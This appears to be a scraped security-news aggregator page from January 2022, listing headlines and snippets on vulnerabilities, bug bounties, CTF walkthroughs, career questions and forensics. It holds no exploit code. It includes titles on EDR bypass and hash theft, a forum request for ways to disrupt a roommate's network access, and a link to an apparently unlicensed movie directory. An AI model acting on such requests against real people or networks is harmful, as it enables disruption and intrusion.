    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460 Points: 37 # Comments: 13  ( 4 min )
  • Open

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau [link] [comments]
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
  • Open

    Algorithms for software testing
    submitted by /u/WillyRaezer [link] [comments]
  • Open

    SecWiki News 2022-01-17 Review
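    Yasso: a powerful toolkit for assisting internal network penetration testing by ourren SecWiki Weekly (Issue 411) by ourren Analysis Report on Virtual Currency Crime Patterns in China (Mainland), 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )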
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

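    ThinkPHP Framework Penetration Testing in Practice
    With ThinkPHP running in debug mode, if the server allows external database connections, a large number of requests can be sent by brute-forcing the MySQL service (causing MySQL to become congested).  ( 1 min )
    FreeBuf Morning Briefing | Walmart quietly enters the metaverse; Safari browser vulnerability allows cross-site user tracking
    Walmart will offer users virtual currency and NFTs.  ( 1 min )
    Security competition for domestically produced computer peripherals and Xinchuang (IT application innovation) products: Tophant wins the "Outstanding Organization Award"
    Tophant won the "Outstanding Organization Award" at the 2021 "Cybersecurity Crowdsourced Testing Platform" security competition for domestically produced computer peripherals and Xinchuang products
    Countdown to the Winter Olympics! Tophant's "cybersecurity assurance corps" will deliver on its mission
    Tophant provides dozens of central and state-owned enterprises with cybersecurity assessment services before the Winter Olympics and defensive on-duty monitoring services during the Games, fully safeguarding the security of the Winter Olympics' core systems and network assets.
    The standard "Competency Requirements for Cybersecurity Industry Talent Positions" is officially released
    The body of the standard is divided into six parts, covering the scope of application, normative references, the terms and definitions involved, the main specializations and positions, competency elements, and other aspects.
    Well-known software is being abused: beware of backdoors being opened on your hosts
    Attackers use phishing to lure victims into clicking and running a trojan attached to an email, carrying out the attack in combination with the legitimate Adobe CEF Helper program.  ( 1 min )
    What is an SSL stripping attack?
    An SSL stripping attack is a network attack in which a hacker downgrades a web connection from the more secure HTTPS to the less secure HTTP.  ( 1 min )
    EU conducts a cyberattack exercise against a "virtual" power company
    Last week the EU carried out a simulated cyberattack exercise against a "virtual" power company in Finland.
    National Information Security Standardization Technical Committee releases the national standard "Information Security Technology: Guidelines for Identifying Important Data" (draft for comment) for public consultation
    The Guidelines define "important data" as data that exists in electronic form and that, if tampered with, destroyed, leaked, or illegally obtained or used, could endanger national security or the public interest.  ( 1 min )
    Russia claims to have dismantled the well-known ransomware gang REvil
    Russia's Federal Security Service (FSB) announced that it has dismantled the REvil ransomware gang, the group behind a series of attacks on large organizations such as Kaseya and JBS USA.
    Cybersecurity trends for 2022: 7 heating up, 2 cooling down
    Nine major security trends for 2022; the scope and sophistication of attacks are expected to become even harder to deal with in the new year.  ( 1 min )
    What clustering algorithms are there, and how are they categorized?
    To understand clustering algorithms and to distinguish and compare them, it is best to consider the specific algorithms in the context of cluster analysis as a whole.  ( 1 min )
    The 30 most commonly exploited software vulnerabilities of 2020 and 2021
    As for all the 0-days, custom malware and other completely unknown security vulnerabilities, they have existed for years and been widely exploited.  ( 1 min )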
  • Open

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    Dynamic execution with DInvoke
    After several months of development, and with the latest features now added to the project, I believe Dinvoke_rs is ready for… Continue reading on Medium »  ( 7 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )

  • Open

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MitM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolish enough to use their fake log in page. Do Coinbase, Binance, etc have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Just completed my Security+. What should I do next
    Just completed my Security+ and not sure what I should do next. Interested more in Blue team than red team. submitted by /u/Linux98 [link] [comments]  ( 1 min )
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow Facebook guide to intercept Facebook lite android application which uses binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with NoPE Proxy extension which intercept traffic. The enable checkbox can't be checked, even if I launched burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get, port unreachable after I set my phone dns to my machine IP as mentioned in fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic ! submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be Information Security Analyst with bachelor IT degree plus certifications? Can I work in Cyber Security field and be Cyber Security with bachelor IT plus certifications? Can I get into Information Security Analyst and/or Cyber Security field without a degree at all? What certifications you guys recommend? I am thinking doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, experience year, and state? Anyone live in FL and doing Information Security Analyst can give me insight of this job market situation in FL. Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good though? submitted by /u/OlympicAnalEater [link] [comments]  ( 3 min )
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: Https://somepage.com /login.php <--- endpoint But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta [link] [comments]  ( 2 min )
    Do you include CVEs on your resume?
    If you have “accredited” CVEs how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions [link] [comments]  ( 1 min )
  • Open

    You're running untrusted code!
    submitted by /u/nfrankel [link] [comments]  ( 1 min )
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-16 Review
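    Security Academic Conference Rankings (2021 edition) by ourren Graph Embedding in Practice series: Node2vec principles and hands-on code by ourren A first look at WebAssembly by ourren Interpreting modern cybercrime patterns by ourren For more of the latest articles, visit SecWiki  ( 2 min )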
  • Open

    Bug Type: HTML injection in confirmation Email !
    Hey Everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty. Continue reading on Medium »  ( 2 min )
    Advanced persistent threat (APT)
    When a system is under attack, most people think of it as a one-time transfer. When a hacker finds a way to enter into the system, he… Continue reading on Medium »  ( 1 min )
    WTF IS IDOR!?
    One of the most crucial Vulnerabilities listed in top 10 of OWASP is Insecure Direct Object Reference Vulnerability (IDOR Vulnerability)… Continue reading on Medium »  ( 3 min )
    Authentication Bypass -TryHackMe
    Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i was able to see Sensitive Information on One of the India’s best School Website.
    Hello Readers, Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience on how you should start your bug bounty journey. Irrespective of your technical background… Continue reading on Medium »
  • Open

    Dark Web Scraping by OSINT - Scraping & Tools
    ➢ Dark Web Scraping & Tools Continue reading on Medium »  ( 5 min )
    Dark Web Scraping by OSINT - Darknet & TOR
    ➢ History of the Dark Web Continue reading on Medium »  ( 4 min )
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    ➢ What is OSINT? Continue reading on Medium »  ( 2 min )
  • Open

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    I couldn't think of a title so here is a start a long long of music..Feeling sublime? Dont be a tool.I have the cure, If you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

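    FreeBuf Morning Briefing | China's cybersecurity market to maintain growth above 15% over the next three years; Linux malware grew 35% in 2021
    The China Cybersecurity Industry Alliance released the "China Cybersecurity Industry Analysis Report (2021)", predicting that over the next three years the cybersecurity market will maintain a growth rate above 15%, with the market size exceeding 80 billion yuan by 2023.  ( 1 min )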
  • Open

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000
  • Open

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell [link] [comments]
  • Open

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app and leads to undesirable effects. (One could argue this is a vulnerability in App B by itself but) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69 [link] [comments]  ( 1 min )

  • Open

    How i found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone ! , Hope you all are doing well, I would like to share my “Broken Access Control Through out-of-sync setup” Continue reading on Medium »  ( 6 min )
  • Open

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell [link] [comments]
  • Open

    Need your ideas for my Master's year project
    My project is on Honeypot, so basically what I did till now is, I have deployed T-Pot Honeypot on my machine and started getting attacks on it and my plan is to create firewall against those attacks. I am also thinking to do a comparison analysis of SIEM tool : ELK and Splunk but not sure I should do it or not. So, I need you to give some more ideas like what else can be done and how should I create firewall? Thanks in advance. submitted by /u/GuireccSS [link] [comments]  ( 1 min )
    Blocking DNS over HTTPS
    basically 443 already headache since cannot decrypt traffic for all of devices but i think DNS over HTTPS is one of the important items. Anything can be done besides manually blocking some known dns providers list? Adding note: Purpose is network security, dont want dns over http on the network. I know not only dns can be passed through 443 but this seems like most important submitted by /u/shodanless [link] [comments]  ( 2 min )
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing…something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that doesn’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills, loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate; installing any new hardware is impossible; access to the router is impossible; buying a 2nd internet connection is impossible. The model therefore should be the target's computer, which must be impacted by the actor's computer directly, through the router possibly, but without changing any settings on it submitted by /u/JamieOvechkin [link] [comments]  ( 5 min )
    Who do we hire and why?
    Some of the past subjects and replies seem to imply there are a lot of questions on what is a qualified cyber security employee. So let's try to help the boys and gurls that want to enter this career and are not sure of what we are looking for. So for all you hiring managers and anyone that was involved in hiring decisions for Cyber Security hires in the past 5 years (Pre and post covid), please answer the following questions and let's see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ball park salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Auto Motive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…  ( 4 min )
    Is 1.1.1.1 a vpn?
    submitted by /u/Environmental_Camp24 [link] [comments]  ( 1 min )
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example, the Arch Linux installation medium. I see this behavior with factory default Secure Boot keys which likely are MSI's and Microsoft's keys and with my own keys. But keys shouldn't matter since the Arch Linux installation medium isn't signed by anybody: The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot. source I reverted to the version 7B86vAD where Secure Boot works as expected. The last reply from the MSI support was: I: I do not use Windows at all. Support: Generally speaking, the secure boot won't take effect if you system cannot be supported. Please don't worry about it. Thanks! Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal [link] [comments]  ( 1 min )
    Do you allow google docs to your employees on the LAN?
    Hi Folks As we all know Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware so we are blocking them in our corporate LAN. Lately, our organization's employee satisfaction department in HR started conducting surveys using Google doc by sharing link with all employees and asked IT department to ensure it is working on all desktops. Is it safe to allow ? I understand there are security risks but a business demand on the other hand that needs to be taken care of. Can someone give second thought on this please? Would love to have your valuable inputs submitted by /u/techno_it [link] [comments]  ( 2 min )
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously so I'm currently looking at hiring a vendor to do penetration testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say, "Kali" unless you can help me with a specific program I can use on that veritable swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2 [link] [comments]  ( 3 min )
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za on my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it so I wanted to finish it by contacting the site's support and ask if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me since I wrote an email around the same time and other useless emails at that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. Current PC has had a clean bill of health so far. Problem is I have done very sensitive stuff on that PC from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this. submitted by /u/WrestleMaykr [link] [comments]  ( 2 min )
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.) Does anyone know of any software that can do this or should I just try to create my own? Thanks in advance submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    Being aggressively targeted how can I make a VM that cannot put anything on my host machine?
    Hello everyone first off I just want to say great community, second of all, I have a question that needs severe attention. Me and my father are being aggressively targeted from malware writers for a reason I don't want to reveal, we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there when this can all be done open source, and with some smart minds. I need to have Windows 10 on my machine for business software unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if thats the best way to do this, if not please say so), or multiple VM's. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself on to my host machine. How exactly is this possible, and what settings do I need to set, what Linux distro should I use, and will I be safe using the business software which is Win10 only on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. ​ Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev [link] [comments]  ( 4 min )
    Issues with GIAC labs?
    I have a buddy who is studying for a giac exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm [link] [comments]  ( 1 min )
    deleted google account
    i am trying to recover data from a deleted google account. i have local law enforcement requesting all data related to the google account. are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast [link] [comments]  ( 1 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis [link] [comments]  ( 1 min )
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM [link] [comments]
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-15 Review
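    Applying end-to-end models to employee attrition early warning by ourren A first look at common attack techniques of the Internet underground economy by ourren Zeek - Detect Godzilla WebShell by ourren Thoughts on the evolution of cloud firewall products by ourren MSF+: generating trojans that evade traffic detection by ourren Dissecting the OceanLotus group's malicious file customization strategy by ourren r3kapig skill stack 1.0 by ourren Building the X通 information security training system by ourren ATT&CK Techniques to Security Events by ourren For more of the latest articles, visit SecWiki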
  • Open

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Google Search operators
    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together and explaining the difference between inurl and -inurl? Do I put the file types in brackets, (.mkv|.mp4|.avi|.mov|.mpg|.wmv) like this or does it matter? IE; intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note; commands are in a different order. Does order matter? The above link only explains one command at a time but, apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50 [link] [comments]  ( 1 min )
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl [link] [comments]

  • Open

    Autopsy with wireshark
    Can you import pcap files from wireshark into Autopsy? is there an expansion to do this? submitted by /u/swatteam23 [link] [comments]  ( 1 min )
    Cellebrite 4PC PC requirements
    LE that is just about to become my department's first and sole cellebrite user. We are putting a budget together (cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked and everything looks good except a computer build. We've talked with 2 other cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with cellebrite. I've built a pc before and have a basic knowledge about them, however I don't get these $4k+ build costs when all that's really necessary is an average build with an Intel processor and a decent amount of ram. Besides that I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other cellebrite users just getting railroaded by vendors selling them overpriced pre-built models or is there something more to the build/requirements. Any advice would be greatly appreciated. submitted by /u/crimsontidepride [link] [comments]  ( 4 min )
    Secure storage identification
    A follow-up to my previous post, can confirm that the premium tools are able to obtain contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use besides relying on the product to tell you? submitted by /u/scrappybytes [link] [comments]  ( 1 min )
  • Open

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm [link] [comments]
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Massive collection of music (mostly not well known artists)
    Update: Ok, i did not know the links redirected to Amazon (As i do not download mp3 files usually) What caught my attention was the bands names that i did not know about submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    In orginization stored xss using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored xss on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436
  • Open

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch [link] [comments]
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
  • Open

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (north Africa) I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what are my chances to find a job abroad. The usual destination for us is France but tbh I'm looking for somewhere else, anywhere in Europe,the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good.The thing is my experience is limited to school projects and 2 internships where I touched on the real world work. I'm not posting my CV unless requested, I'm not here looking for a job (and I don't want to break any rule) but I'm here to ask. Please keep in mind the COVID situation in the world right now which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh [link] [comments]  ( 1 min )
    What tools do you use to audit AD users?
    What tools do you use to audit users on AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx [link] [comments]  ( 2 min )
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering how is the work of application security engineers at meta/fb? Do they write code? or only do code reviews? What are the usual tasks of an engineer in such role? submitted by /u/sapup [link] [comments]  ( 1 min )
    CEO scam solution?
    Problem is: fake CEO or Senior Officials social media profiles are used to scam ("pay this fee to get this job"). - What solutions could monitor web/social media to find such fake profiles or websites? - Would these solutions find this? or is it something into social media/web monitoring? Thank you for the answers submitted by /u/NerdSupremacist [link] [comments]  ( 1 min )
    What's the name of this app that displays your other usernames?
    Few years ago, a friend of mine was travelling in GCC. (Gulf States) His friend showed him an app where he fed my friend's phone number and all his social ids popped up. All the different usernames he has been using, on other social media platforms, going back to several years. The sites that he remembers his id from - Grindr, Manjam, Gaydar, Badoo etc. Does anyone knows what is this thing called? or what is the name of such app? submitted by /u/saffrown [link] [comments]  ( 1 min )
    Newbie with a couple questions about the CEH v11!
    Top of the mornin to ya fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so and I have the following questions. Is 3 months enough of a prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+) Access to the ilabs, The Textbook, Messier's Practice Tests, Messier's Study Guide, O'Reilly's Videos and Messier's v10 videos on Udemy. Will this do for prep material? Question about CEH Practical here. Will the Practical exam be a good first step on a year long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley [link] [comments]  ( 1 min )
    TikTok is hideous...but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant that was aghast I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly [link] [comments]  ( 5 min )
    Salary range for Jr Security Analyst at Bay Area CA
    Hi all, I was wondering what would be the salary range for Junior security analyst position at the Bay Area California? Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie [link] [comments]  ( 2 min )
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains though about 1000. Recently a security research company started running port scans and this is affecting our website health. With some pages going down and the CPU usage crossing threshold. Basically the application is deployed in AKS(k8s) and the backends are behind the Azure Front Door and some subdomains are managed by Global Traffic Manager as well all on Azure. Unfortunately we cannot stop these scans however we have been asked to change our design or solution as the port scanner hit every subdomain at the same point which all of them points to a single host and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much efficient way submitted by /u/SnooGoats8879 [link] [comments]  ( 1 min )
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, prisma cloud and orca security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath [link] [comments]  ( 1 min )
    Taken care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with Lastpass to help them with passwords but is there anything for android that is the equivalent of LogMeIn? Also more of a general question but how do you all care for your parents tech wise? Not sure if I am overstepping my boundaries but I've already had one family fall prey to a scammer. submitted by /u/OakenRage [link] [comments]  ( 1 min )
  • Open

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva [link] [comments]
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-01-14 Review
    No news updates yet today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Bug Alert —Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS Continue reading on Medium »  ( 2 min )
    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… Continue reading on Medium »  ( 8 min )
  • Open

    Honeypot Discussions Part-2
    Honeypot Types Continue reading on Medium »  ( 4 min )
    Powershell Execution Strategy
    What is powershell execution strategy Continue reading on Medium »  ( 6 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

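    Ukrainian police arrest ransomware gang that attacked more than 50 companies
    Ukrainian police arrested five cybercriminals; the gang reportedly used ransomware to attack about 50 US and European companies.  ( 1 min )
    Knowledge Continent Q&A vol.03 | First steps on the new continent
    A roundup of popular questions about the official release launch!  ( 1 min )
    FreeBuf street interviews | At the start of 2022 we talked with 10 passers-by about cybersecurity
    The FreeBuf team randomly interviewed passers-by on the street to see how aware they really are of cybersecurity and personal protection.
    Java code audit: XSS (cross-site scripting)
    Working out how to defend against XSS by analyzing what causes it  ( 4 min )
    FreeBuf Weekly | "Cybersecurity Knowledge Continent" 1.0 officially launches; Facebook introduces "Privacy Center"
    Happy weekend, FreeBufers. Here is this week's "FreeBuf Weekly", in which we summarize and recommend the week's hot news, quality articles and handy tools so that you don't miss any of this week's highlights!  ( 1 min )
    See you in Shanghai on March 2! CIS 2021 Spring edition topics to be announced soon
    FreeBuf invites everyone in cybersecurity to gather on March 2-3 at the Baohua Marriott Hotel in Shanghai for the "CIS 2021 Cybersecurity Innovation Conference, Spring edition".  ( 1 min )
    White House hosts open source security summit attended by many tech giants
    On January 13 local time, many tech giants and federal agencies gathered at the White House to discuss open source software security.
    联软科技 releases its top ten endpoint security trends for 2022
    As a leader in enterprise endpoint security in China, 联软科技 draws on 19 years of endpoint security practice and industry experience and has published leading-edge endpoint security trends for three consecutive years, aiming to give the industry new ideas and reference points.  ( 1 min )
    Iranian hacking group APT35 exploits Log4j vulnerability to deploy new PowerShell backdoor
    Research indicates that the Iranian group APT35 is exploiting the Log4Shell vulnerability in attacks and planting a new backdoor.  ( 1 min )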
  • Open

    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1 # Comments: 0  ( 2 min )
  • Open

    The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More
    We identify recent trends in web threats, including top malware families. Web skimmers, difficult to detect and easy to deploy, are highlighted. The post The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More appeared first on Unit42.

  • Open

    Bug Report : [ No Valid SPF Records ]
